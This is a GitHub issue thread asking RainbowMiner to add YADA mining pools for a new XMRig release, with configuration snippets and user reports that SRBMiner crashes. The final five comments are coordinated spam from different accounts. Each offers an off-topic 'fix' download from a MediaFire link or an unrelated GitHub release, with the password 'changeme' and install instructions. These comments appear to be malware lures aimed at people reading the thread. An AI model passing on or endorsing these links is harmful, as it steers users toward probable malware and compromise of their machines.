### ISSUE TITLE
Adding Pools for New XMRIG release

### ISSUE THREAD

**Issue by RoyCRoderickIII** [RainbowMiner/RainbowMiner#2837]
Given the main branch of XMRIG has finally added YADA support, it would be nice to add the Dominant Pools.

http://yadapool.org:8001/
"algo": "rx/yada",
"url": "yadapool.org:3333",
"user": "Your wallet address.Worker ID",
"keepalive": true,

http://yadaminers.pl/
"algo": "rx/yada",
"url": "yadaminers.pl:3333",
"user": "YOUR_WALLET_ADDRESS.WORKER_ID@CUST_DIFF",
"nicehash": false,
"keepalive": true,

http://pool.yadacoin.io/
Create wallet
Download XMRigCC
XMRigCC conf.json settings:
"algo": "rx/yada",
"url": "pool.yadacoin.io:3333",
"user": "Your wallet address.Worker ID",
"keepalive": true,

**Comment by whitindllc** [comment]
i cant seem to get srb to work with it at all

**Comment by RoyCRoderickIII** [comment]
I used XMRIGCC in the past just fine, been waiting for the official xmrig version, never used srb though

**Comment by whitindllc** [comment]
srb has support for it... but it crashes and burns every time

**Comment by RainbowMiner** [comment]
Yes, seems like SrbminerMulti's implementation of RandomYada is buggy. Luckily we have the new version of Xmrig at hand now :)

**Comment by whitindllc** [comment]
yeah its garbage.... i have a userpool for a different yada pool... the US one ... and the newest code base on a few pcs... but it doesnt try to use xmrig only srb

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Dnts1** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
